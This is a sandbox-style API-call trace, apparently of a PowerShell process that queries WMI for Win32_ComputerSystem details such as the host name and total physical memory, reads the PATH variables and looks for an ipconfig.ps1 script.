	[0212.729] IUnknown:QueryInterface (in: This=0x1c840950, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c238 | out: ppvObject=0x1c80c238*=0x0) returned 0x80004002
	[0212.730] IUnknown:AddRef (This=0x1c840950) returned 0x3
	[0212.730] CoGetContextToken (in: pToken=0x1c80c0f0 | out: pToken=0x1c80c0f0) returned 0x0
	[0212.730] IUnknown:QueryInterface (in: This=0x1c840950, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c0b0 | out: ppvObject=0x1c80c0b0*=0x1c840958) returned 0x0
	[0212.730] IMarshal:GetUnmarshalClass (in: This=0x1c840958, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c0e0 | out: pCid=0x1c80c0e0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0212.730] IUnknown:Release (This=0x1c840958) returned 0x3
	[0212.731] CoGetContextToken (in: pToken=0x1c80c0c0 | out: pToken=0x1c80c0c0) returned 0x0
	[0212.731] IUnknown:AddRef (This=0x1c840950) returned 0x4
	[0212.731] IUnknown:QueryInterface (in: This=0x1c840950, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c1d8 | out: ppvObject=0x1c80c1d8*=0x0) returned 0x80004002
	[0212.731] IUnknown:Release (This=0x1c840950) returned 0x3
	[0212.731] IUnknown:Release (This=0x1c840950) returned 0x2
	[0212.732] CoGetContextToken (in: pToken=0x1c80c580 | out: pToken=0x1c80c580) returned 0x0
	[0212.732] CoGetContextToken (in: pToken=0x1c80c4c0 | out: pToken=0x1c80c4c0) returned 0x0
	[0212.732] IUnknown:AddRef (This=0x1c840950) returned 0x3
	[0212.732] IUnknown:QueryInterface (in: This=0x1c840950, riid=0x1c80c600*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80c5e0 | out: ppvObject=0x1c80c5e0*=0x1c840950) returned 0x0
	[0212.732] IUnknown:Release (This=0x1c840950) returned 0x3
	[0212.732] IUnknown:Release (This=0x1c840950) returned 0x2
	[0212.733] IUnknown:Release (This=0x1c840950) returned 0x1
	[0212.733] CoTaskMemFree (pv=0x1b8227a0) 
	[0212.733] CoGetContextToken (in: pToken=0x1c80cf00 | out: pToken=0x1c80cf00) returned 0x0
	[0212.733] IUnknown:AddRef (This=0x1c840950) returned 0x2
	[0212.733] IWbemClassObject:Get (in: This=0x1c840950, wszName="__GENUS", lFlags=0, pVal=0x1c80d070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d06c*=0, plFlavor=0x1c80d068*=0 | out: pVal=0x1c80d070*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d06c*=3, plFlavor=0x1c80d068*=64) returned 0x0
	[0212.733] IWbemClassObject:Get (in: This=0x1c840950, wszName="__PATH", lFlags=0, pVal=0x1c80d010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d00c*=0, plFlavor=0x1c80d008*=0 | out: pVal=0x1c80d010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d00c*=8, plFlavor=0x1c80d008*=64) returned 0x0
	[0212.734] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0212.734] CoGetObjectContext (in: riid=0x1c80cfa8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfa0 | out: ppv=0x1c80cfa0*=0x181868) returned 0x0
	[0212.734] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfc0 | out: pAptType=0x1c80cfc0*=1) returned 0x0
	[0212.734] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0c8 | out: ppvObject=0x1c80d0c8*=0x0) returned 0x80004002
	[0212.734] IUnknown:Release (This=0x181868) returned 0x1
	[0212.735] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c630 | out: ppv=0x1c80c630*=0x1c831de0) returned 0x0
	[0212.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c831de0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c340 | out: ppvObject=0x1c80c340*=0x0) returned 0x80004002
	[0212.736] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c831de0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c328 | out: ppvObject=0x1c80c328*=0x1c842090) returned 0x0
	[0212.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c842090, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c230 | out: ppvObject=0x1c80c230*=0x1c842090) returned 0x0
	[0212.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c842090, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c2b0 | out: ppvObject=0x1c80c2b0*=0x0) returned 0x80004002
	[0212.737] WbemDefPath:IUnknown:AddRef (This=0x1c842090) returned 0x3
	[0212.737] CoGetContextToken (in: pToken=0x1c80bf00 | out: pToken=0x1c80bf00) returned 0x0
	[0212.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c842090, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bec0 | out: ppvObject=0x1c80bec0*=0x1b82be00) returned 0x0
	[0212.738] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b82be00, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bef0 | out: pCid=0x1c80bef0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0212.738] WbemDefPath:IUnknown:Release (This=0x1b82be00) returned 0x3
	[0212.739] CoGetContextToken (in: pToken=0x1c80bed0 | out: pToken=0x1c80bed0) returned 0x0
	[0212.739] WbemDefPath:IUnknown:AddRef (This=0x1c842090) returned 0x4
	[0212.739] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c842090, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bfe8 | out: ppvObject=0x1c80bfe8*=0x0) returned 0x80004002
	[0212.739] WbemDefPath:IUnknown:Release (This=0x1c842090) returned 0x3
	[0212.739] WbemDefPath:IUnknown:Release (This=0x1c842090) returned 0x2
	[0212.739] WbemDefPath:IUnknown:Release (This=0x1c831de0) returned 0x0
	[0212.740] WbemDefPath:IUnknown:Release (This=0x1c842090) returned 0x1
	[0212.740] CoGetContextToken (in: pToken=0x1c80cc00 | out: pToken=0x1c80cc00) returned 0x0
	[0212.740] CoGetContextToken (in: pToken=0x1c80cb40 | out: pToken=0x1c80cb40) returned 0x0
	[0212.740] WbemDefPath:IUnknown:AddRef (This=0x1c842090) returned 0x2
	[0212.740] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c842090, riid=0x1c80cc80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cc60 | out: ppvObject=0x1c80cc60*=0x1c842090) returned 0x0
	[0212.740] WbemDefPath:IUnknown:Release (This=0x1c842090) returned 0x2
	[0212.740] WbemDefPath:IUnknown:Release (This=0x1c842090) returned 0x1
	[0212.741] CoGetContextToken (in: pToken=0x1c80cd80 | out: pToken=0x1c80cd80) returned 0x0
	[0212.741] CoGetContextToken (in: pToken=0x1c80ccc0 | out: pToken=0x1c80ccc0) returned 0x0
	[0212.741] WbemDefPath:IUnknown:AddRef (This=0x1c842090) returned 0x2
	[0212.741] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c842090, riid=0x1c80ce00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cde0 | out: ppvObject=0x1c80cde0*=0x1c842090) returned 0x0
	[0212.741] WbemDefPath:IUnknown:Release (This=0x1c842090) returned 0x2
	[0212.741] WbemDefPath:IUnknown:AddRef (This=0x1c842090) returned 0x3
	[0212.741] WbemDefPath:IWbemPath:SetText (This=0x1c842090, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0212.742] WbemDefPath:IUnknown:Release (This=0x1c842090) returned 0x2
	[0212.742] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80d040 | out: puCount=0x1c80d040*=0x2) returned 0x0
	[0212.742] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d040*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d040*=0x17, pszText=0x0) returned 0x0
	[0212.742] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d040*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d040*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.742] CoTaskMemAlloc (cb=0x8) returned 0x1b8227a0
	[0212.742] IEnumWbemClassObject:Next (in: This=0x1c8408e8, lTimeout=-1, uCount=0x1, apObjects=0x1b8227a0, puReturned=0x1c80d0f8 | out: apObjects=0x1b8227a0*=0x0, puReturned=0x1c80d0f8*=0x0) returned 0x1
	[0212.745] CoTaskMemFree (pv=0x1b8227a0) 
	[0212.745] CoGetContextToken (in: pToken=0x1c80ce80 | out: pToken=0x1c80ce80) returned 0x0
	[0212.745] WbemLocator:IUnknown:Release (This=0x1b8085b0) returned 0x1
	[0212.745] IUnknown:Release (This=0x1c8408e8) returned 0x0
	[0212.757] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0212.757] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0212.757] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.757] IWbemClassObject:Get (in: This=0x1c840950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0212.758] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0212.758] IWbemClassObject:Get (in: This=0x1c840950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0212.758] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0212.758] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0212.758] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0212.758] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.758] IWbemClassObject:Get (in: This=0x1c840950, wszName="__CLASS", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0212.758] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0212.758] IWbemClassObject:Get (in: This=0x1c840950, wszName="__CLASS", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0212.759] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0212.759] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0212.759] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0212.759] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.759] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0212.759] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0212.759] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.759] IWbemClassObject:GetNames (in: This=0x1c840950, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c80d128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c80d120 | out: pNames=0x1c80d120*="\x01ƀ\x08") returned 0x0
	[0212.760] SafeArrayGetDim (psa=0x1b82e0c0) returned 0x1
	[0212.760] IWbemClassObject:Get (in: This=0x1c840950, wszName="__GENUS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.761] IWbemClassObject:Get (in: This=0x1c840950, wszName="__CLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.761] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0212.761] IWbemClassObject:Get (in: This=0x1c840950, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.761] IWbemClassObject:Get (in: This=0x1c840950, wszName="__DYNASTY", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.761] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0212.762] IWbemClassObject:Get (in: This=0x1c840950, wszName="__RELPATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.762] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0212.762] IWbemClassObject:Get (in: This=0x1c840950, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.762] IWbemClassObject:Get (in: This=0x1c840950, wszName="__DERIVATION", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b82e0c0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b822790, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c80d11c*=8200, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.763] IWbemClassObject:Get (in: This=0x1c840950, wszName="__SERVER", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.763] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0212.763] IWbemClassObject:Get (in: This=0x1c840950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.763] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0212.763] IWbemClassObject:Get (in: This=0x1c840950, wszName="__PATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0212.763] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0212.764] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80d1c0 | out: puCount=0x1c80d1c0*=0x2) returned 0x0
	[0212.764] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d1c0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1c0*=0x17, pszText=0x0) returned 0x0
	[0212.764] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d1c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.764] IWbemClassObject:Get (in: This=0x1c840950, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x1c80d1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d1ac*=0, plFlavor=0x1c80d1a8*=0 | out: pVal=0x1c80d1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x1c80d1ac*=21, plFlavor=0x1c80d1a8*=32) returned 0x0
	[0212.764] SysStringLen (param_1="2146942976") returned 0xa
	[0212.764] IWbemClassObject:Get (in: This=0x1c840950, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x1c80d3e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d3dc*=21, plFlavor=0x1c80d3d8*=32 | out: pVal=0x1c80d3e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x1c80d3dc*=21, plFlavor=0x1c80d3d8*=32) returned 0x0
	[0212.764] SysStringLen (param_1="2146942976") returned 0xa
	[0213.035] CoTaskMemAlloc (cb=0x104) returned 0x1b824740
	[0213.035] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b824740, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0213.035] CoTaskMemFree (pv=0x1b824740) 
	[0213.041] CoTaskMemAlloc (cb=0x104) returned 0x1b824740
	[0213.041] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b824740, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0213.041] CoTaskMemFree (pv=0x1b824740) 
	[0213.041] CoTaskMemAlloc (cb=0x128) returned 0x1b7cc8c0
	[0213.041] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7cc8c0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0213.042] CoTaskMemFree (pv=0x1b7cc8c0) 
	[0213.051] CoTaskMemAlloc (cb=0x20e) returned 0x1b7c9ef0
	[0213.051] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7c9ef0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0213.051] CoTaskMemFree (pv=0x1b7c9ef0) 
	[0213.058] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.060] SetErrorMode (uMode=0x1) returned 0x1
	[0213.064] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.ps1", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.505] SetErrorMode (uMode=0x1) returned 0x1
	[0213.508] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
